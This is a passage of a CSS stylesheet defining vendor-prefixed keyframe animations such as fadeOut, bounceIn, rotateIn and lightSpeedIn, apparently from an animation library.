-webkit-transform: translateX(-2000px);
}
100% {
opacity: 1;
-webkit-transform: translateX(0);
}
}
@-moz-keyframes fadeInLeftBig {
0% {
opacity: 0;
-moz-transform: translateX(-2000px);
}
100% {
opacity: 1;
-moz-transform: translateX(0);
}
}
@-o-keyframes fadeInLeftBig {
0% {
opacity: 0;
-o-transform: translateX(-2000px);
}
100% {
opacity: 1;
-o-transform: translateX(0);
}
}
@keyframes fadeInLeftBig {
0% {
opacity: 0;
transform: translateX(-2000px);
}
100% {
opacity: 1;
transform: translateX(0);
}
}
.fadeInLeftBig {
-webkit-animation-name: fadeInLeftBig;
-moz-animation-name: fadeInLeftBig;
-o-animation-name: fadeInLeftBig;
animation-name: fadeInLeftBig;
}
@-webkit-keyframes fadeInRightBig {
0% {
opacity: 0;
-webkit-transform: translateX(2000px);
}
100% {
opacity: 1;
-webkit-transform: translateX(0);
}
}
@-moz-keyframes fadeInRightBig {
0% {
opacity: 0;
-moz-transform: translateX(2000px);
}
100% {
opacity: 1;
-moz-transform: translateX(0);
}
}
@-o-keyframes fadeInRightBig {
0% {
opacity: 0;
-o-transform: translateX(2000px);
}
100% {
opacity: 1;
-o-transform: translateX(0);
}
}
@keyframes fadeInRightBig {
0% {
opacity: 0;
transform: translateX(2000px);
}
100% {
opacity: 1;
transform: translateX(0);
}
}
.fadeInRightBig {
-webkit-animation-name: fadeInRightBig;
-moz-animation-name: fadeInRightBig;
-o-animation-name: fadeInRightBig;
animation-name: fadeInRightBig;
}
@-webkit-keyframes fadeOut {
0% {opacity: 1;}
100% {opacity: 0;}
}
@-moz-keyframes fadeOut {
0% {opacity: 1;}
100% {opacity: 0;}
}
@-o-keyframes fadeOut {
0% {opacity: 1;}
100% {opacity: 0;}
}
@keyframes fadeOut {
0% {opacity: 1;}
100% {opacity: 0;}
}
.fadeOut {
-webkit-animation-name: fadeOut;
-moz-animation-name: fadeOut;
-o-animation-name: fadeOut;
animation-name: fadeOut;
}
@-webkit-keyframes fadeOutUp {
0% {
opacity: 1;
-webkit-transform: translateY(0);
}
100% {
opacity: 0;
-webkit-transform: translateY(-20px);
}
}
@-moz-keyframes fadeOutUp {
0% {
opacity: 1;
-moz-transform: translateY(0);
}
100% {
opacity: 0;
-moz-transform: translateY(-20px);
}
}
@-o-keyframes fadeOutUp {
0% {
opacity: 1;
-o-transform: translateY(0);
}
100% {
opacity: 0;
-o-transform: translateY(-20px);
}
}
@keyframes fadeOutUp {
0% {
opacity: 1;
transform: translateY(0);
}
100% {
opacity: 0;
transform: translateY(-20px);
}
}
.fadeOutUp {
-webkit-animation-name: fadeOutUp;
-moz-animation-name: fadeOutUp;
-o-animation-name: fadeOutUp;
animation-name: fadeOutUp;
}
@-webkit-keyframes fadeOutDown {
0% {
opacity: 1;
-webkit-transform: translateY(0);
}
100% {
opacity: 0;
-webkit-transform: translateY(20px);
}
}
@-moz-keyframes fadeOutDown {
0% {
opacity: 1;
-moz-transform: translateY(0);
}
100% {
opacity: 0;
-moz-transform: translateY(20px);
}
}
@-o-keyframes fadeOutDown {
0% {
opacity: 1;
-o-transform: translateY(0);
}
100% {
opacity: 0;
-o-transform: translateY(20px);
}
}
@keyframes fadeOutDown {
0% {
opacity: 1;
transform: translateY(0);
}
100% {
opacity: 0;
transform: translateY(20px);
}
}
.fadeOutDown {
-webkit-animation-name: fadeOutDown;
-moz-animation-name: fadeOutDown;
-o-animation-name: fadeOutDown;
animation-name: fadeOutDown;
}
@-webkit-keyframes fadeOutLeft {
0% {
opacity: 1;
-webkit-transform: translateX(0);
}
100% {
opacity: 0;
-webkit-transform: translateX(-20px);
}
}
@-moz-keyframes fadeOutLeft {
0% {
opacity: 1;
-moz-transform: translateX(0);
}
100% {
opacity: 0;
-moz-transform: translateX(-20px);
}
}
@-o-keyframes fadeOutLeft {
0% {
opacity: 1;
-o-transform: translateX(0);
}
100% {
opacity: 0;
-o-transform: translateX(-20px);
}
}
@keyframes fadeOutLeft {
0% {
opacity: 1;
transform: translateX(0);
}
100% {
opacity: 0;
transform: translateX(-20px);
}
}
.fadeOutLeft {
-webkit-animation-name: fadeOutLeft;
-moz-animation-name: fadeOutLeft;
-o-animation-name: fadeOutLeft;
animation-name: fadeOutLeft;
}
@-webkit-keyframes fadeOutRight {
0% {
opacity: 1;
-webkit-transform: translateX(0);
}
100% {
opacity: 0;
-webkit-transform: translateX(20px);
}
}
@-moz-keyframes fadeOutRight {
0% {
opacity: 1;
-moz-transform: translateX(0);
}
100% {
opacity: 0;
-moz-transform: translateX(20px);
}
}
@-o-keyframes fadeOutRight {
0% {
opacity: 1;
-o-transform: translateX(0);
}
100% {
opacity: 0;
-o-transform: translateX(20px);
}
}
@keyframes fadeOutRight {
0% {
opacity: 1;
transform: translateX(0);
}
100% {
opacity: 0;
transform: translateX(20px);
}
}
.fadeOutRight {
-webkit-animation-name: fadeOutRight;
-moz-animation-name: fadeOutRight;
-o-animation-name: fadeOutRight;
animation-name: fadeOutRight;
}
@-webkit-keyframes fadeOutUpBig {
0% {
opacity: 1;
-webkit-transform: translateY(0);
}
100% {
opacity: 0;
-webkit-transform: translateY(-2000px);
}
}
@-moz-keyframes fadeOutUpBig {
0% {
opacity: 1;
-moz-transform: translateY(0);
}
100% {
opacity: 0;
-moz-transform: translateY(-2000px);
}
}
@-o-keyframes fadeOutUpBig {
0% {
opacity: 1;
-o-transform: translateY(0);
}
100% {
opacity: 0;
-o-transform: translateY(-2000px);
}
}
@keyframes fadeOutUpBig {
0% {
opacity: 1;
transform: translateY(0);
}
100% {
opacity: 0;
transform: translateY(-2000px);
}
}
.fadeOutUpBig {
-webkit-animation-name: fadeOutUpBig;
-moz-animation-name: fadeOutUpBig;
-o-animation-name: fadeOutUpBig;
animation-name: fadeOutUpBig;
}
@-webkit-keyframes fadeOutDownBig {
0% {
opacity: 1;
-webkit-transform: translateY(0);
}
100% {
opacity: 0;
-webkit-transform: translateY(2000px);
}
}
@-moz-keyframes fadeOutDownBig {
0% {
opacity: 1;
-moz-transform: translateY(0);
}
100% {
opacity: 0;
-moz-transform: translateY(2000px);
}
}
@-o-keyframes fadeOutDownBig {
0% {
opacity: 1;
-o-transform: translateY(0);
}
100% {
opacity: 0;
-o-transform: translateY(2000px);
}
}
@keyframes fadeOutDownBig {
0% {
opacity: 1;
transform: translateY(0);
}
100% {
opacity: 0;
transform: translateY(2000px);
}
}
.fadeOutDownBig {
-webkit-animation-name: fadeOutDownBig;
-moz-animation-name: fadeOutDownBig;
-o-animation-name: fadeOutDownBig;
animation-name: fadeOutDownBig;
}
@-webkit-keyframes fadeOutLeftBig {
0% {
opacity: 1;
-webkit-transform: translateX(0);
}
100% {
opacity: 0;
-webkit-transform: translateX(-2000px);
}
}
@-moz-keyframes fadeOutLeftBig {
0% {
opacity: 1;
-moz-transform: translateX(0);
}
100% {
opacity: 0;
-moz-transform: translateX(-2000px);
}
}
@-o-keyframes fadeOutLeftBig {
0% {
opacity: 1;
-o-transform: translateX(0);
}
100% {
opacity: 0;
-o-transform: translateX(-2000px);
}
}
@keyframes fadeOutLeftBig {
0% {
opacity: 1;
transform: translateX(0);
}
100% {
opacity: 0;
transform: translateX(-2000px);
}
}
.fadeOutLeftBig {
-webkit-animation-name: fadeOutLeftBig;
-moz-animation-name: fadeOutLeftBig;
-o-animation-name: fadeOutLeftBig;
animation-name: fadeOutLeftBig;
}
@-webkit-keyframes fadeOutRightBig {
0% {
opacity: 1;
-webkit-transform: translateX(0);
}
100% {
opacity: 0;
-webkit-transform: translateX(2000px);
}
}
@-moz-keyframes fadeOutRightBig {
0% {
opacity: 1;
-moz-transform: translateX(0);
}
100% {
opacity: 0;
-moz-transform: translateX(2000px);
}
}
@-o-keyframes fadeOutRightBig {
0% {
opacity: 1;
-o-transform: translateX(0);
}
100% {
opacity: 0;
-o-transform: translateX(2000px);
}
}
@keyframes fadeOutRightBig {
0% {
opacity: 1;
transform: translateX(0);
}
100% {
opacity: 0;
transform: translateX(2000px);
}
}
.fadeOutRightBig {
-webkit-animation-name: fadeOutRightBig;
-moz-animation-name: fadeOutRightBig;
-o-animation-name: fadeOutRightBig;
animation-name: fadeOutRightBig;
}
@-webkit-keyframes bounceIn {
0% {
opacity: 0;
-webkit-transform: scale(.3);
}
50% {
opacity: 1;
-webkit-transform: scale(1.05);
}
70% {
-webkit-transform: scale(.9);
}
100% {
-webkit-transform: scale(1);
}
}
@-moz-keyframes bounceIn {
0% {
opacity: 0;
-moz-transform: scale(.3);
}
50% {
opacity: 1;
-moz-transform: scale(1.05);
}
70% {
-moz-transform: scale(.9);
}
100% {
-moz-transform: scale(1);
}
}
@-o-keyframes bounceIn {
0% {
opacity: 0;
-o-transform: scale(.3);
}
50% {
opacity: 1;
-o-transform: scale(1.05);
}
70% {
-o-transform: scale(.9);
}
100% {
-o-transform: scale(1);
}
}
@keyframes bounceIn {
0% {
opacity: 0;
transform: scale(.3);
}
50% {
opacity: 1;
transform: scale(1.05);
}
70% {
transform: scale(.9);
}
100% {
transform: scale(1);
}
}
.bounceIn {
-webkit-animation-name: bounceIn;
-moz-animation-name: bounceIn;
-o-animation-name: bounceIn;
animation-name: bounceIn;
}
@-webkit-keyframes bounceInUp {
0% {
opacity: 0;
-webkit-transform: translateY(2000px);
}
60% {
opacity: 1;
-webkit-transform: translateY(-30px);
}
80% {
-webkit-transform: translateY(10px);
}
100% {
-webkit-transform: translateY(0);
}
}
@-moz-keyframes bounceInUp {
0% {
opacity: 0;
-moz-transform: translateY(2000px);
}
60% {
opacity: 1;
-moz-transform: translateY(-30px);
}
80% {
-moz-transform: translateY(10px);
}
100% {
-moz-transform: translateY(0);
}
}
@-o-keyframes bounceInUp {
0% {
opacity: 0;
-o-transform: translateY(2000px);
}
60% {
opacity: 1;
-o-transform: translateY(-30px);
}
80% {
-o-transform: translateY(10px);
}
100% {
-o-transform: translateY(0);
}
}
@keyframes bounceInUp {
0% {
opacity: 0;
transform: translateY(2000px);
}
60% {
opacity: 1;
transform: translateY(-30px);
}
80% {
transform: translateY(10px);
}
100% {
transform: translateY(0);
}
}
.bounceInUp {
-webkit-animation-name: bounceInUp;
-moz-animation-name: bounceInUp;
-o-animation-name: bounceInUp;
animation-name: bounceInUp;
}
@-webkit-keyframes bounceInDown {
0% {
opacity: 0;
-webkit-transform: translateY(-2000px);
}
60% {
opacity: 1;
-webkit-transform: translateY(30px);
}
80% {
-webkit-transform: translateY(-10px);
}
100% {
-webkit-transform: translateY(0);
}
}
@-moz-keyframes bounceInDown {
0% {
opacity: 0;
-moz-transform: translateY(-2000px);
}
60% {
opacity: 1;
-moz-transform: translateY(30px);
}
80% {
-moz-transform: translateY(-10px);
}
100% {
-moz-transform: translateY(0);
}
}
@-o-keyframes bounceInDown {
0% {
opacity: 0;
-o-transform: translateY(-2000px);
}
60% {
opacity: 1;
-o-transform: translateY(30px);
}
80% {
-o-transform: translateY(-10px);
}
100% {
-o-transform: translateY(0);
}
}
@keyframes bounceInDown {
0% {
opacity: 0;
transform: translateY(-2000px);
}
60% {
opacity: 1;
transform: translateY(30px);
}
80% {
transform: translateY(-10px);
}
100% {
transform: translateY(0);
}
}
.bounceInDown {
-webkit-animation-name: bounceInDown;
-moz-animation-name: bounceInDown;
-o-animation-name: bounceInDown;
animation-name: bounceInDown;
}
@-webkit-keyframes bounceInLeft {
0% {
opacity: 0;
-webkit-transform: translateX(-2000px);
}
60% {
opacity: 1;
-webkit-transform: translateX(30px);
}
80% {
-webkit-transform: translateX(-10px);
}
100% {
-webkit-transform: translateX(0);
}
}
@-moz-keyframes bounceInLeft {
0% {
opacity: 0;
-moz-transform: translateX(-2000px);
}
60% {
opacity: 1;
-moz-transform: translateX(30px);
}
80% {
-moz-transform: translateX(-10px);
}
100% {
-moz-transform: translateX(0);
}
}
@-o-keyframes bounceInLeft {
0% {
opacity: 0;
-o-transform: translateX(-2000px);
}
60% {
opacity: 1;
-o-transform: translateX(30px);
}
80% {
-o-transform: translateX(-10px);
}
100% {
-o-transform: translateX(0);
}
}
@keyframes bounceInLeft {
0% {
opacity: 0;
transform: translateX(-2000px);
}
60% {
opacity: 1;
transform: translateX(30px);
}
80% {
transform: translateX(-10px);
}
100% {
transform: translateX(0);
}
}
.bounceInLeft {
-webkit-animation-name: bounceInLeft;
-moz-animation-name: bounceInLeft;
-o-animation-name: bounceInLeft;
animation-name: bounceInLeft;
}
@-webkit-keyframes bounceInRight {
0% {
opacity: 0;
-webkit-transform: translateX(2000px);
}
60% {
opacity: 1;
-webkit-transform: translateX(-30px);
}
80% {
-webkit-transform: translateX(10px);
}
100% {
-webkit-transform: translateX(0);
}
}
@-moz-keyframes bounceInRight {
0% {
opacity: 0;
-moz-transform: translateX(2000px);
}
60% {
opacity: 1;
-moz-transform: translateX(-30px);
}
80% {
-moz-transform: translateX(10px);
}
100% {
-moz-transform: translateX(0);
}
}
@-o-keyframes bounceInRight {
0% {
opacity: 0;
-o-transform: translateX(2000px);
}
60% {
opacity: 1;
-o-transform: translateX(-30px);
}
80% {
-o-transform: translateX(10px);
}
100% {
-o-transform: translateX(0);
}
}
@keyframes bounceInRight {
0% {
opacity: 0;
transform: translateX(2000px);
}
60% {
opacity: 1;
transform: translateX(-30px);
}
80% {
transform: translateX(10px);
}
100% {
transform: translateX(0);
}
}
.bounceInRight {
-webkit-animation-name: bounceInRight;
-moz-animation-name: bounceInRight;
-o-animation-name: bounceInRight;
animation-name: bounceInRight;
}
@-webkit-keyframes bounceOut {
0% {
-webkit-transform: scale(1);
}
25% {
-webkit-transform: scale(.95);
}
50% {
opacity: 1;
-webkit-transform: scale(1.1);
}
100% {
opacity: 0;
-webkit-transform: scale(.3);
}
}
@-moz-keyframes bounceOut {
0% {
-moz-transform: scale(1);
}
25% {
-moz-transform: scale(.95);
}
50% {
opacity: 1;
-moz-transform: scale(1.1);
}
100% {
opacity: 0;
-moz-transform: scale(.3);
}
}
@-o-keyframes bounceOut {
0% {
-o-transform: scale(1);
}
25% {
-o-transform: scale(.95);
}
50% {
opacity: 1;
-o-transform: scale(1.1);
}
100% {
opacity: 0;
-o-transform: scale(.3);
}
}
@keyframes bounceOut {
0% {
transform: scale(1);
}
25% {
transform: scale(.95);
}
50% {
opacity: 1;
transform: scale(1.1);
}
100% {
opacity: 0;
transform: scale(.3);
}
}
.bounceOut {
-webkit-animation-name: bounceOut;
-moz-animation-name: bounceOut;
-o-animation-name: bounceOut;
animation-name: bounceOut;
}
@-webkit-keyframes bounceOutUp {
0% {
-webkit-transform: translateY(0);
}
20% {
opacity: 1;
-webkit-transform: translateY(20px);
}
100% {
opacity: 0;
-webkit-transform: translateY(-2000px);
}
}
@-moz-keyframes bounceOutUp {
0% {
-moz-transform: translateY(0);
}
20% {
opacity: 1;
-moz-transform: translateY(20px);
}
100% {
opacity: 0;
-moz-transform: translateY(-2000px);
}
}
@-o-keyframes bounceOutUp {
0% {
-o-transform: translateY(0);
}
20% {
opacity: 1;
-o-transform: translateY(20px);
}
100% {
opacity: 0;
-o-transform: translateY(-2000px);
}
}
@keyframes bounceOutUp {
0% {
transform: translateY(0);
}
20% {
opacity: 1;
transform: translateY(20px);
}
100% {
opacity: 0;
transform: translateY(-2000px);
}
}
.bounceOutUp {
-webkit-animation-name: bounceOutUp;
-moz-animation-name: bounceOutUp;
-o-animation-name: bounceOutUp;
animation-name: bounceOutUp;
}
@-webkit-keyframes bounceOutDown {
0% {
-webkit-transform: translateY(0);
}
20% {
opacity: 1;
-webkit-transform: translateY(-20px);
}
100% {
opacity: 0;
-webkit-transform: translateY(2000px);
}
}
@-moz-keyframes bounceOutDown {
0% {
-moz-transform: translateY(0);
}
20% {
opacity: 1;
-moz-transform: translateY(-20px);
}
100% {
opacity: 0;
-moz-transform: translateY(2000px);
}
}
@-o-keyframes bounceOutDown {
0% {
-o-transform: translateY(0);
}
20% {
opacity: 1;
-o-transform: translateY(-20px);
}
100% {
opacity: 0;
-o-transform: translateY(2000px);
}
}
@keyframes bounceOutDown {
0% {
transform: translateY(0);
}
20% {
opacity: 1;
transform: translateY(-20px);
}
100% {
opacity: 0;
transform: translateY(2000px);
}
}
.bounceOutDown {
-webkit-animation-name: bounceOutDown;
-moz-animation-name: bounceOutDown;
-o-animation-name: bounceOutDown;
animation-name: bounceOutDown;
}
@-webkit-keyframes bounceOutLeft {
0% {
-webkit-transform: translateX(0);
}
20% {
opacity: 1;
-webkit-transform: translateX(20px);
}
100% {
opacity: 0;
-webkit-transform: translateX(-2000px);
}
}
@-moz-keyframes bounceOutLeft {
0% {
-moz-transform: translateX(0);
}
20% {
opacity: 1;
-moz-transform: translateX(20px);
}
100% {
opacity: 0;
-moz-transform: translateX(-2000px);
}
}
@-o-keyframes bounceOutLeft {
0% {
-o-transform: translateX(0);
}
20% {
opacity: 1;
-o-transform: translateX(20px);
}
100% {
opacity: 0;
-o-transform: translateX(-2000px);
}
}
@keyframes bounceOutLeft {
0% {
transform: translateX(0);
}
20% {
opacity: 1;
transform: translateX(20px);
}
100% {
opacity: 0;
transform: translateX(-2000px);
}
}
.bounceOutLeft {
-webkit-animation-name: bounceOutLeft;
-moz-animation-name: bounceOutLeft;
-o-animation-name: bounceOutLeft;
animation-name: bounceOutLeft;
}
@-webkit-keyframes bounceOutRight {
0% {
-webkit-transform: translateX(0);
}
20% {
opacity: 1;
-webkit-transform: translateX(-20px);
}
100% {
opacity: 0;
-webkit-transform: translateX(2000px);
}
}
@-moz-keyframes bounceOutRight {
0% {
-moz-transform: translateX(0);
}
20% {
opacity: 1;
-moz-transform: translateX(-20px);
}
100% {
opacity: 0;
-moz-transform: translateX(2000px);
}
}
@-o-keyframes bounceOutRight {
0% {
-o-transform: translateX(0);
}
20% {
opacity: 1;
-o-transform: translateX(-20px);
}
100% {
opacity: 0;
-o-transform: translateX(2000px);
}
}
@keyframes bounceOutRight {
0% {
transform: translateX(0);
}
20% {
opacity: 1;
transform: translateX(-20px);
}
100% {
opacity: 0;
transform: translateX(2000px);
}
}
.bounceOutRight {
-webkit-animation-name: bounceOutRight;
-moz-animation-name: bounceOutRight;
-o-animation-name: bounceOutRight;
animation-name: bounceOutRight;
}
@-webkit-keyframes rotateIn {
0% {
-webkit-transform-origin: center center;
-webkit-transform: rotate(-200deg);
opacity: 0;
}
100% {
-webkit-transform-origin: center center;
-webkit-transform: rotate(0);
opacity: 1;
}
}
@-moz-keyframes rotateIn {
0% {
-moz-transform-origin: center center;
-moz-transform: rotate(-200deg);
opacity: 0;
}
100% {
-moz-transform-origin: center center;
-moz-transform: rotate(0);
opacity: 1;
}
}
@-o-keyframes rotateIn {
0% {
-o-transform-origin: center center;
-o-transform: rotate(-200deg);
opacity: 0;
}
100% {
-o-transform-origin: center center;
-o-transform: rotate(0);
opacity: 1;
}
}
@keyframes rotateIn {
0% {
transform-origin: center center;
transform: rotate(-200deg);
opacity: 0;
}
100% {
transform-origin: center center;
transform: rotate(0);
opacity: 1;
}
}
.rotateIn {
-webkit-animation-name: rotateIn;
-moz-animation-name: rotateIn;
-o-animation-name: rotateIn;
animation-name: rotateIn;
}
@-webkit-keyframes rotateInUpLeft {
0% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(90deg);
opacity: 0;
}
100% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
}
@-moz-keyframes rotateInUpLeft {
0% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(90deg);
opacity: 0;
}
100% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(0);
opacity: 1;
}
}
@-o-keyframes rotateInUpLeft {
0% {
-o-transform-origin: left bottom;
-o-transform: rotate(90deg);
opacity: 0;
}
100% {
-o-transform-origin: left bottom;
-o-transform: rotate(0);
opacity: 1;
}
}
@keyframes rotateInUpLeft {
0% {
transform-origin: left bottom;
transform: rotate(90deg);
opacity: 0;
}
100% {
transform-origin: left bottom;
transform: rotate(0);
opacity: 1;
}
}
.rotateInUpLeft {
-webkit-animation-name: rotateInUpLeft;
-moz-animation-name: rotateInUpLeft;
-o-animation-name: rotateInUpLeft;
animation-name: rotateInUpLeft;
}
@-webkit-keyframes rotateInDownLeft {
0% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(-90deg);
opacity: 0;
}
100% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
}
@-moz-keyframes rotateInDownLeft {
0% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(-90deg);
opacity: 0;
}
100% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(0);
opacity: 1;
}
}
@-o-keyframes rotateInDownLeft {
0% {
-o-transform-origin: left bottom;
-o-transform: rotate(-90deg);
opacity: 0;
}
100% {
-o-transform-origin: left bottom;
-o-transform: rotate(0);
opacity: 1;
}
}
@keyframes rotateInDownLeft {
0% {
transform-origin: left bottom;
transform: rotate(-90deg);
opacity: 0;
}
100% {
transform-origin: left bottom;
transform: rotate(0);
opacity: 1;
}
}
.rotateInDownLeft {
-webkit-animation-name: rotateInDownLeft;
-moz-animation-name: rotateInDownLeft;
-o-animation-name: rotateInDownLeft;
animation-name: rotateInDownLeft;
}
@-webkit-keyframes rotateInUpRight {
0% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(-90deg);
opacity: 0;
}
100% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
}
@-moz-keyframes rotateInUpRight {
0% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(-90deg);
opacity: 0;
}
100% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(0);
opacity: 1;
}
}
@-o-keyframes rotateInUpRight {
0% {
-o-transform-origin: right bottom;
-o-transform: rotate(-90deg);
opacity: 0;
}
100% {
-o-transform-origin: right bottom;
-o-transform: rotate(0);
opacity: 1;
}
}
@keyframes rotateInUpRight {
0% {
transform-origin: right bottom;
transform: rotate(-90deg);
opacity: 0;
}
100% {
transform-origin: right bottom;
transform: rotate(0);
opacity: 1;
}
}
.rotateInUpRight {
-webkit-animation-name: rotateInUpRight;
-moz-animation-name: rotateInUpRight;
-o-animation-name: rotateInUpRight;
animation-name: rotateInUpRight;
}
@-webkit-keyframes rotateInDownRight {
0% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(90deg);
opacity: 0;
}
100% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
}
@-moz-keyframes rotateInDownRight {
0% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(90deg);
opacity: 0;
}
100% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(0);
opacity: 1;
}
}
@-o-keyframes rotateInDownRight {
0% {
-o-transform-origin: right bottom;
-o-transform: rotate(90deg);
opacity: 0;
}
100% {
-o-transform-origin: right bottom;
-o-transform: rotate(0);
opacity: 1;
}
}
@keyframes rotateInDownRight {
0% {
transform-origin: right bottom;
transform: rotate(90deg);
opacity: 0;
}
100% {
transform-origin: right bottom;
transform: rotate(0);
opacity: 1;
}
}
.rotateInDownRight {
-webkit-animation-name: rotateInDownRight;
-moz-animation-name: rotateInDownRight;
-o-animation-name: rotateInDownRight;
animation-name: rotateInDownRight;
}
@-webkit-keyframes rotateOut {
0% {
-webkit-transform-origin: center center;
-webkit-transform: rotate(0);
opacity: 1;
}
100% {
-webkit-transform-origin: center center;
-webkit-transform: rotate(200deg);
opacity: 0;
}
}
@-moz-keyframes rotateOut {
0% {
-moz-transform-origin: center center;
-moz-transform: rotate(0);
opacity: 1;
}
100% {
-moz-transform-origin: center center;
-moz-transform: rotate(200deg);
opacity: 0;
}
}
@-o-keyframes rotateOut {
0% {
-o-transform-origin: center center;
-o-transform: rotate(0);
opacity: 1;
}
100% {
-o-transform-origin: center center;
-o-transform: rotate(200deg);
opacity: 0;
}
}
@keyframes rotateOut {
0% {
transform-origin: center center;
transform: rotate(0);
opacity: 1;
}
100% {
transform-origin: center center;
transform: rotate(200deg);
opacity: 0;
}
}
.rotateOut {
-webkit-animation-name: rotateOut;
-moz-animation-name: rotateOut;
-o-animation-name: rotateOut;
animation-name: rotateOut;
}
@-webkit-keyframes rotateOutUpLeft {
0% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
100% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(-90deg);
opacity: 0;
}
}
@-moz-keyframes rotateOutUpLeft {
0% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(0);
opacity: 1;
}
100% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(-90deg);
opacity: 0;
}
}
@-o-keyframes rotateOutUpLeft {
0% {
-o-transform-origin: left bottom;
-o-transform: rotate(0);
opacity: 1;
}
100% {
-o-transform-origin: left bottom;
-o-transform: rotate(-90deg);
opacity: 0;
}
}
@keyframes rotateOutUpLeft {
0% {
transform-origin: left bottom;
transform: rotate(0);
opacity: 1;
}
100% {
-transform-origin: left bottom;
-transform: rotate(-90deg);
opacity: 0;
}
}
.rotateOutUpLeft {
-webkit-animation-name: rotateOutUpLeft;
-moz-animation-name: rotateOutUpLeft;
-o-animation-name: rotateOutUpLeft;
animation-name: rotateOutUpLeft;
}
@-webkit-keyframes rotateOutDownLeft {
0% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
100% {
-webkit-transform-origin: left bottom;
-webkit-transform: rotate(90deg);
opacity: 0;
}
}
@-moz-keyframes rotateOutDownLeft {
0% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(0);
opacity: 1;
}
100% {
-moz-transform-origin: left bottom;
-moz-transform: rotate(90deg);
opacity: 0;
}
}
@-o-keyframes rotateOutDownLeft {
0% {
-o-transform-origin: left bottom;
-o-transform: rotate(0);
opacity: 1;
}
100% {
-o-transform-origin: left bottom;
-o-transform: rotate(90deg);
opacity: 0;
}
}
@keyframes rotateOutDownLeft {
0% {
transform-origin: left bottom;
transform: rotate(0);
opacity: 1;
}
100% {
transform-origin: left bottom;
transform: rotate(90deg);
opacity: 0;
}
}
.rotateOutDownLeft {
-webkit-animation-name: rotateOutDownLeft;
-moz-animation-name: rotateOutDownLeft;
-o-animation-name: rotateOutDownLeft;
animation-name: rotateOutDownLeft;
}
@-webkit-keyframes rotateOutUpRight {
0% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
100% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(90deg);
opacity: 0;
}
}
@-moz-keyframes rotateOutUpRight {
0% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(0);
opacity: 1;
}
100% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(90deg);
opacity: 0;
}
}
@-o-keyframes rotateOutUpRight {
0% {
-o-transform-origin: right bottom;
-o-transform: rotate(0);
opacity: 1;
}
100% {
-o-transform-origin: right bottom;
-o-transform: rotate(90deg);
opacity: 0;
}
}
@keyframes rotateOutUpRight {
0% {
transform-origin: right bottom;
transform: rotate(0);
opacity: 1;
}
100% {
transform-origin: right bottom;
transform: rotate(90deg);
opacity: 0;
}
}
.rotateOutUpRight {
-webkit-animation-name: rotateOutUpRight;
-moz-animation-name: rotateOutUpRight;
-o-animation-name: rotateOutUpRight;
animation-name: rotateOutUpRight;
}
@-webkit-keyframes rotateOutDownRight {
0% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(0);
opacity: 1;
}
100% {
-webkit-transform-origin: right bottom;
-webkit-transform: rotate(-90deg);
opacity: 0;
}
}
@-moz-keyframes rotateOutDownRight {
0% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(0);
opacity: 1;
}
100% {
-moz-transform-origin: right bottom;
-moz-transform: rotate(-90deg);
opacity: 0;
}
}
@-o-keyframes rotateOutDownRight {
0% {
-o-transform-origin: right bottom;
-o-transform: rotate(0);
opacity: 1;
}
100% {
-o-transform-origin: right bottom;
-o-transform: rotate(-90deg);
opacity: 0;
}
}
@keyframes rotateOutDownRight {
0% {
transform-origin: right bottom;
transform: rotate(0);
opacity: 1;
}
100% {
transform-origin: right bottom;
transform: rotate(-90deg);
opacity: 0;
}
}
.rotateOutDownRight {
-webkit-animation-name: rotateOutDownRight;
-moz-animation-name: rotateOutDownRight;
-o-animation-name: rotateOutDownRight;
animation-name: rotateOutDownRight;
}
@-webkit-keyframes lightSpeedIn {
0% { -webkit-transform: translateX(100%) skewX(-30deg); opacity: 0; }
60% { -webkit-transform: translateX(-20%) skewX(30deg); opacity: 1; }
80% { -webkit-transform: translateX(0%) skewX(-15deg); opacity: 1; }
100% { -webkit-transform: translateX(0%) skewX(0deg); opacity: 1; }
}
@-moz-keyframes lightSpeedIn {
0% { -moz-transform: translateX(100%) skewX(-30deg); opacity: 0; }
60% { -moz-transform: translateX(-20%) skewX(30deg); opacity: 1; }
80% { -moz-transform: translateX(0%) skewX(-15deg); opacity: 1; }
100% { -moz-transform: translateX(0%) skewX(0deg); opacity: 1; }
}
@-o-keyframes lightSpeedIn {
0% { -o-transform: translateX(100%) skewX(-30deg); opacity: 0; }
60% { -o-transform: translateX(-20%) skewX(30deg); opacity: 1; }
80% { -o-transform: translateX(0%) skewX(-15deg); opacity: 1; }
100% { -o-transform: translateX(0%) skewX(0deg); opacity: 1; }
}
@keyframes lightSpeedIn {
0% { transform: translateX(100%) skewX(-30deg); opacity: 0; }
60% { transform: translateX(-20%) skewX(30deg); opacity: 1; }
80% { transform: translateX(0%) skewX(-15deg); opacity: 1; }
100% { transform: translateX(0%) skewX(0deg); opacity: 1; }
}
.lightSpeedIn {
-webkit-animation-name: lightSpeedIn;
-moz-animation-name: lightSpeedIn;
-o-animation-name: lightSpeedIn;
animation-name: lightSpeedIn;
-webkit-animation-timing-function: ease-out;
-moz-animation-timing-function: ease-out;
